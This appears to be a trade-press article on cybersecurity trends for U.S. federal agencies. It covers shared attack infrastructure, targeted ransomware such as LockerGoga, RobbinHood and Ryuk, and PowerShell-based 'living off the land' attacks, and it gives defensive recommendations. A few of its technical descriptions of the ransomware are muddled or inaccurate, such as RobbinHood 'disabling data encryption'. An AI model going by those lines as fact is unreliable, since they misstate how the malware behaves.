Federal Agencies that leverage up-to-date threat intelligence and convert it into actionable mitigation will be able to develop better policies, tools, and integrate strategies which are necessary to fight against the latest cyber threats.
FREMONT, CA: As humans migrate more into digital space, the need to protect the data becomes more crucial. The departments and agencies within the United States government have advanced over time to address the modern-day problems and meet day-to-day needs of citizens. The U.S. federal government contains over 430 departments, agencies, and sub-agencies, including millions of workers and devices. Because of the scope of centralized management and control systems, prioritized to be limited to specific agencies, and specific solutions, a cross-collaboration between agencies can quickly become a challenge. Not only does the lack of solo management solution decrease the visibility, but the security profile of an interconnected cross-agency system is decreased to the risk profile of the weakest link in the entire cybersecurity chain.
Though the task of maintaining consistent federal cybersecurity can be dreadful, it will be successful if they are informed by a common set of data derived from current attack tactics. Agencies can know where to strengthen their networks and which controls should be a priority in their modernization initiatives. Here are three important emerging trends that agencies should keep in mind.
Public Infrastructure and Threats
Almost around 60 percent of threats share at least one common public infrastructure element. Along with this, when the threats share the infrastructure, they are more likely to use these resources at the same stage of the kill chain. By using this information, IT teams can actively search for, and block or monitor traffic led to or from these common domains. Observing this threat pattern carefully can also help disclose how similar attacks might function or show the agencies how similar classes of threats evolve.
Ransomware is becoming more specific
During the first quarter of 2019, cyber culprits deploying the LockerGoga ransomware used deep recognition to pre-target victims and evaded detection. The second quarter, RobbinHood and Ryuk ransomware variants, with similar strategy, have targeted certain municipalities. RobbinHood can also disable data encryption and prevent systems from disconnecting from shared drives, while Ryuk uses high-tech evasion tactics that includes destroying its encryption key and deleting shadow copies from infected systems to ensure that defenders are unaware of its presence. The Federal IT teams should secure ransomware entryways like the email and teach the workers how to spot and respond to phishing emails and other tactics. Agencies need to perform regular data backups, scan them for malware, and then store off the network. Data restoration drills should also be conducted to guarantee that data restoration is efficient and accurate.
Attackers "live off the land."
The tactics exploit pre-installed tools on the specific system to install malware, increases the privilege, and offers malicious payloads. The attacker's attack strategy is difficult to identify because they look like legal traffic. PowerShell, which comes pre-installed on Windows machines, is commonly used for these kinds of attacks, as it can be executed from memory, is opaque, and is trusted enabling to bypass security efforts similar to the whitelisting. Although PowerShell is one of the largest profile targets for this attack type, similar other tools are also being frequently compromised. This trend is one of the major trends for federal agencies to be aware of, especially when they run so much legacy IT. Federal IT teams should know which tools are running within the network, comprising the tools pre-installed on devices, as a part of an application suite or fixed in operating systems. The teams then need to implement dynamic trust policies and also the intent-based segmentation so that when the previously trusted tool acts doubtfully, it is immediately identified and separated to an isolated network segment until it is determined to be secure.
Cybersecurity has become a prime focus across the globe for the government, private citizens, and companies. As the government tries to measure the breadth of cybersecurity, the question of how best to manage the threats and organize defenses arises. Presently, there are cybersecurity divisions within various agencies, that includes the Federal Bureau of Investigation, the Department of Defense, the Department of Homeland Security, and various intelligence groups such as the CIA and the NSA.